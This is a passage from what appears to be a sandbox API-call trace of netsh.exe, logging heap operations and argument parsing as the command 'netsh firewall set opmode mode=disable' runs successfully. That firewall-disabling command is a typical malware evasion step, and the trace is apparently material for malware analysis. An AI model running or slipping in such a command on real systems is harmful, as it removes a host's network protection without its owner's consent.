(in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f5f0 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f5f0 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x35f6f0 [0176.974] wcscpy_s (in: _Destination=0x35f6f0, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f630 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f610 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f610 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa) returned 0x35f630 [0176.974] wcscpy_s (in: _Destination=0x35f630, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f670 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f650 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f650 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x31ee90 [0176.974] wcscpy_s (in: _Destination=0x31ee90, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31eeb0 | out: hHeap=0x2d0000) returned 1 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f690 | out: hHeap=0x2d0000) returned 1 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f690 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x35f670 [0176.975] wcscpy_s (in: _Destination=0x35f670, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6d0 | out: hHeap=0x2d0000) returned 1 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6b0 | out: hHeap=0x2d0000) returned 1 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x38) returned 0x35a520 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x35f6b0 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x35f6d0 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31eeb0 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x35f710 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa) returned 0x35f730 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35f730, Size=0xc) returned 0x35f750 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35f750, Size=0x1a) returned 0x355900 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x35f750 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35f750, Size=0xe) returned 0x35f730 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35f730, Size=0x1e) returned 0x355930 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x355930, Size=0x20) returned 0x355960 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x355960, Size=0x26) returned 0x355930 [0176.975] GetProcessHeap () returned 0x2d0000 [0176.975] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x355930, Size=0x28) returned 0x355960 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x355960, Size=0x34) returned 0x35a560 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35a560, Size=0x36) returned 0x35a5a0 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x35a5a0, Size=0x4e) returned 0x33ea50 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33ea50 | out: hHeap=0x2d0000) returned 1 [0176.976] _wcsnicmp (_String1="firewall", _String2="dump", _MaxCount=0x8) returned 2 [0176.976] _wcsnicmp (_String1="firewall", _String2="help", _MaxCount=0x8) returned -2 [0176.976] _wcsnicmp (_String1="firewall", _String2="?", _MaxCount=0x8) returned 39 [0176.976] _wcsnicmp (_String1="firewall", _String2="exec", _MaxCount=0x8) returned 1 [0176.976] _wcsnicmp (_String1="firewall", _String2="advfirew", _MaxCount=0x8) returned 5 [0176.976] _wcsnicmp (_String1="firewall", _String2="branchca", _MaxCount=0x8) returned 4 [0176.976] _wcsnicmp (_String1="firewall", _String2="bridge", _MaxCount=0x8) returned 4 [0176.976] _wcsnicmp (_String1="firewall", _String2="dhcpclie", _MaxCount=0x8) returned 2 [0176.976] _wcsnicmp (_String1="firewall", _String2="dnsclien", _MaxCount=0x8) returned 2 [0176.976] _wcsnicmp (_String1="firewall", _String2="firewall", _MaxCount=0x8) returned 0 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f730 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f750 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4e) returned 0x33ea50 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f770 [0176.976] GetProcessHeap () returned 0x2d0000 [0176.976] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x35f790 [0176.977] wcscpy_s (in: _Destination=0x35f790, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f7b0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x35f7d0 [0176.977] wcscpy_s (in: _Destination=0x35f7d0, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f7f0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31eed0 [0176.977] wcscpy_s (in: _Destination=0x31eed0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f810 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x35f830 [0176.977] wcscpy_s (in: _Destination=0x35f830, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f850 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa) returned 0x35f870 [0176.977] wcscpy_s (in: _Destination=0x35f870, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f890 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x31eee0 [0176.977] wcscpy_s (in: _Destination=0x31eee0, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f8b0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x35f8d0 [0176.977] wcscpy_s (in: _Destination=0x35f8d0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33ea50 | out: hHeap=0x2d0000) returned 1 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f750 | out: hHeap=0x2d0000) returned 1 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.977] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f7d0 | out: hHeap=0x2d0000) returned 1 [0176.977] GetProcessHeap () returned 0x2d0000 [0176.978] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x35f7d0 [0176.978] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0176.978] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0176.978] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0176.978] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0176.978] _wcsnicmp (_String1="set", _String2="add", _MaxCount=0x3) returned 18 [0176.978] _wcsnicmp (_String1="set", _String2="del", _MaxCount=0x3) returned 15 [0176.978] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0176.978] _wcsnicmp (_String1="opmode", _String2="help", _MaxCount=0x6) returned 7 [0176.978] _wcsnicmp (_String1="opmode", _String2="?", _MaxCount=0x6) returned 48 [0176.978] wcstok (in: _String="allowedprogram", _Delimiter=" ", _Context=0x7fef788a400 | out: _String="allowedprogram", _Context=0x7fef788a400) returned="allowedprogram" [0176.978] _wcsnicmp (_String1="opmode", _String2="allowe", _MaxCount=0x6) returned 14 [0176.978] wcstok (in: _String="icmpsetting", _Delimiter=" ", _Context=0x7fef788a3d0 | out: _String="icmpsetting", _Context=0x7fef788a3d0) returned="icmpsetting" [0176.978] _wcsnicmp (_String1="opmode", _String2="icmpse", _MaxCount=0x6) returned 6 [0176.978] wcstok (in: _String="logging", _Delimiter=" ", _Context=0x7fef788a3c0 | out: _String="logging", _Context=0x7fef788a3c0) returned="logging" [0176.978] _wcsnicmp (_String1="opmode", _String2="loggin", _MaxCount=0x6) returned 3 [0176.978] wcstok (in: _String="multicastbroadcastresponse", _Delimiter=" ", _Context=0x7fef788a388 | out: _String="multicastbroadcastresponse", _Context=0x7fef788a388) returned="multicastbroadcastresponse" [0176.978] _wcsnicmp (_String1="opmode", _String2="multic", _MaxCount=0x6) returned 2 [0176.978] wcstok (in: _String="notifications", _Delimiter=" ", _Context=0x7fef788a368 | out: _String="notifications", _Context=0x7fef788a368) returned="notifications" [0176.978] _wcsnicmp (_String1="opmode", _String2="notifi", _MaxCount=0x6) returned 1 [0176.978] wcstok (in: _String="opmode", _Delimiter=" ", _Context=0x7fef788a358 | out: _String="opmode", _Context=0x7fef788a358) returned="opmode" [0176.978] _wcsnicmp (_String1="opmode", _String2="opmode", _MaxCount=0x6) returned 0 [0176.978] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0176.978] _wcsnicmp (_String1="mode=disable", _String2="help", _MaxCount=0xc) returned 5 [0176.978] _wcsnicmp (_String1="mode=disable", _String2="?", _MaxCount=0xc) returned 46 [0176.979] MatchTagsInCmdLine () returned 0x0 [0176.979] wcspbrk (_String="mode=disable", _Control="=") returned="=disable" [0176.979] GetProcessHeap () returned 0x2d0000 [0176.979] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x355960 [0176.979] wcscpy_s (in: _Destination=0x355960, _SizeInWords=0xd, _Source="mode=disable" | out: _Destination="mode=disable") returned 0x0 [0176.979] wcstok (in: _String="mode=disable", _Delimiter="=", _Context=0x35591a*=0x0 | out: _String="mode", _Context=0x35591a*=0x0) returned="mode" [0176.979] _wcsnicmp (_String1="mode", _String2="mode", _MaxCount=0x4) returned 0 [0176.979] wcscpy_s (in: _Destination=0x355900, _SizeInWords=0xd, _Source="disable" | out: _Destination="disable") returned 0x0 [0176.979] GetProcessHeap () returned 0x2d0000 [0176.979] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x355960 | out: hHeap=0x2d0000) returned 1 [0176.979] MatchEnumTag () returned 0x0 [0176.979] _wcsnicmp (_String1="disable", _String2="enable", _MaxCount=0x7) returned -1 [0176.979] _wcsnicmp (_String1="disable", _String2="disable", _MaxCount=0x7) returned 0 [0177.604] PrintError () returned 0x131 [0177.604] LoadStringW (in: hInstance=0x7fef7a70000, uID=0x119a, lpBuffer=0x1e3680, cchBufferMax=8192 | out: lpBuffer="\nIMPORTANT: Command executed successfully.\nHowever, \"netsh firewall\" is deprecated;\nuse \"netsh advfirewall firewall\" instead.\nFor more information on using \"netsh advfirewall firewall\" commands\ninstead of \"netsh firewall\", see KB article 947709\nat http://go.microsoft.com/fwlink/?linkid=121488 .\n\n") returned 0x129 [0177.604] FormatMessageW (in: dwFlags=0x500, lpSource=0x1e3680, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1e3660, nSize=0x0, Arguments=0x1e3670 | out: lpBuffer="\x9580\x35") returned 0x131 [0177.604] GetStdHandle (nStdHandle=0xfffffff5) returned 0xb8 [0177.604] GetConsoleOutputCP () returned 0x1b5 [0177.604] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat http://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 306 [0177.604] GetProcessHeap () returned 0x2d0000 [0177.604] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x132) returned 0x2bbdde0 [0177.604] GetConsoleOutputCP () returned 0x1b5 [0177.604] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat http://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x2bbdde0, cbMultiByte=306, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nIMPORTANT: Command executed successfully.\r\nHowever, \"netsh firewall\" is deprecated;\r\nuse \"netsh advfirewall firewall\" instead.\r\nFor more information on using \"netsh advfirewall firewall\" commands\r\ninstead of \"netsh firewall\", see KB article 947709\r\nat http://go.microsoft.com/fwlink/?linkid=121488 .\r\n\r\n", lpUsedDefaultChar=0x0) returned 306 [0177.604] WriteFile (in: hFile=0xb8, lpBuffer=0x2bbdde0*, nNumberOfBytesToWrite=0x131, lpNumberOfBytesWritten=0x1e3630, lpOverlapped=0x0 | out: lpBuffer=0x2bbdde0*, lpNumberOfBytesWritten=0x1e3630*=0x131, lpOverlapped=0x0) returned 1 [0177.604] GetProcessHeap () returned 0x2d0000 [0177.604] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2bbdde0 | out: hHeap=0x2d0000) returned 1 [0177.604] LocalFree (hMem=0x359580) returned 0x0 [0177.604] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x1e3730, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0177.605] FormatMessageW (in: dwFlags=0x500, lpSource=0x1e3730, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1e3710, nSize=0x0, Arguments=0x1e3720 | out: lpBuffer="\xe430\x31") returned 0x5 [0177.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0xb8 [0177.605] GetConsoleOutputCP () returned 0x1b5 [0177.605] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0177.605] GetProcessHeap () returned 0x2d0000 [0177.605] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x6) returned 0x31eef0 [0177.605] GetConsoleOutputCP () returned 0x1b5 [0177.605] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x31eef0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0177.605] WriteFile (in: hFile=0xb8, lpBuffer=0x31eef0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1e36c0, lpOverlapped=0x0 | out: lpBuffer=0x31eef0*, lpNumberOfBytesWritten=0x1e36c0*=0x5, lpOverlapped=0x0) returned 1 [0177.605] GetProcessHeap () returned 0x2d0000 [0177.605] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31eef0 | out: hHeap=0x2d0000) returned 1 [0177.605] LocalFree (hMem=0x31e430) returned 0x0 [0177.605] FormatMessageW (in: dwFlags=0x500, lpSource=0xf11504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1e7740, nSize=0x0, Arguments=0x1e7750 | out: lpBuffer="\xf750\x35") returned 0x2 [0177.605] GetStdHandle (nStdHandle=0xfffffff5) returned 0xb8 [0177.605] GetConsoleOutputCP () returned 0x1b5 [0177.605] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0177.605] GetProcessHeap () returned 0x2d0000 [0177.605] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3) returned 0x31eef0 [0177.605] GetConsoleOutputCP () returned 0x1b5 [0177.606] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x31eef0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0177.606] WriteFile (in: hFile=0xb8, lpBuffer=0x31eef0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1e76f0, lpOverlapped=0x0 | out: lpBuffer=0x31eef0*, lpNumberOfBytesWritten=0x1e76f0*=0x2, lpOverlapped=0x0) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31eef0 | out: hHeap=0x2d0000) returned 1 [0177.606] LocalFree (hMem=0x35f750) returned 0x0 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6b0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6d0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31eeb0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f710 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x355900 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35a520 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a4d0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a4b0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31eec0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a450 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6f0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f5f0 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f630 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f610 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ee90 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f650 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f670 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.606] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f690 | out: hHeap=0x2d0000) returned 1 [0177.606] GetProcessHeap () returned 0x2d0000 [0177.607] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a430 | out: hHeap=0x2d0000) returned 1 [0177.607] GetProcessHeap () returned 0x2d0000 [0177.607] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a490 | out: hHeap=0x2d0000) returned 1 [0177.607] GetProcessHeap () returned 0x2d0000 [0177.607] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a470 | out: hHeap=0x2d0000) returned 1 [0177.607] GetProcessHeap () returned 0x2d0000 [0177.607] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a410 | out: hHeap=0x2d0000) returned 1 [0177.628] GetProcessHeap () returned 0x2d0000 [0177.628] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32f400 | out: hHeap=0x2d0000) returned 1 [0177.629] FreeLibrary (hLibModule=0xf10000) returned 1 [0177.629] FreeLibrary (hLibModule=0x7fef83a0000) returned 1 [0177.629] free (_Block=0x257ea0) [0177.630] LocalFree (hMem=0x2f63e0) returned 0x0 [0177.630] LocalFree (hMem=0x2f6730) returned 0x0 [0177.630] LocalFree (hMem=0x2f6840) returned 0x0 [0177.630] LocalFree (hMem=0x2f4f10) returned 0x0 [0177.630] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x35fdc0 [0177.630] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2f4f10 [0177.630] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x33fc90 [0177.631] free (_Block=0x255a40) [0177.631] free (_Block=0x0) [0177.631] free (_Block=0x255a20) [0177.631] free (_Block=0x255a60) [0177.631] free (_Block=0x255ab0) [0177.631] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x360af0 [0177.632] LocalFree (hMem=0x360af0) returned 0x0 [0177.632] LocalFree (hMem=0x2f6860) returned 0x0 [0177.632] LocalFree (hMem=0x35fdc0) returned 0x0 [0177.632] free (_Block=0x257c90) [0177.632] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefee20000 [0177.632] FreeLibrary (hLibModule=0x7fefee20000) returned 1 [0177.632] LocalFree (hMem=0x33fc90) returned 0x0 [0177.632] LocalFree (hMem=0x2f4f10) returned 0x0 [0177.632] GlobalHandle (pMem=0x2f61c0) returned 0xa60008 [0177.632] GlobalUnlock (hMem=0xa60008) returned 0 [0177.639] FreeLibrary (hLibModule=0x7fef3fb0000) returned 1 [0177.640] FreeLibrary (hLibModule=0x7fef82d0000) returned 1 [0177.641] FreeLibrary (hLibModule=0x7fef7ab0000) returned 1 [0177.642] FreeLibrary (hLibModule=0x7fef7aa0000) returned 1 [0177.643] FreeLibrary (hLibModule=0x7fef7a70000) returned 1 [0177.644] FreeLibrary (hLibModule=0x7fef4320000) returned 1 [0177.653] FreeLibrary (hLibModule=0x7fef43b0000) returned 1 [0177.654] FreeLibrary (hLibModule=0x7fef3f70000) returned 1 [0177.655] FreeLibrary (hLibModule=0x7fef4310000) returned 1 [0177.682] FreeLibrary (hLibModule=0x7fef3f60000) returned 1 [0177.684] FreeLibrary (hLibModule=0x7fef3f50000) returned 1 [0177.686] FreeLibrary (hLibModule=0x7fef3f30000) returned 1 [0177.687] FreeLibrary (hLibModule=0x7fef3ba0000) returned 1 [0177.691] FreeLibrary (hLibModule=0x7fef3aa0000) returned 1 [0178.058] FreeLibrary (hLibModule=0x7fef3900000) returned 1 [0178.062] FreeLibrary (hLibModule=0x7fef38b0000) returned 1 [0178.062] FreeLibrary (hLibModule=0x7fef3880000) returned 1 [0178.181] FreeLibrary (hLibModule=0x7fef3780000) returned 1 [0178.181] FreeLibrary (hLibModule=0x7fef3620000) returned 1 [0178.190] FreeLibrary (hLibModule=0x7fef3530000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 [0178.193] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3241a0 | out: hHeap=0x2d0000) returned 1 [0178.193] GetProcessHeap () returned 0x2d0000 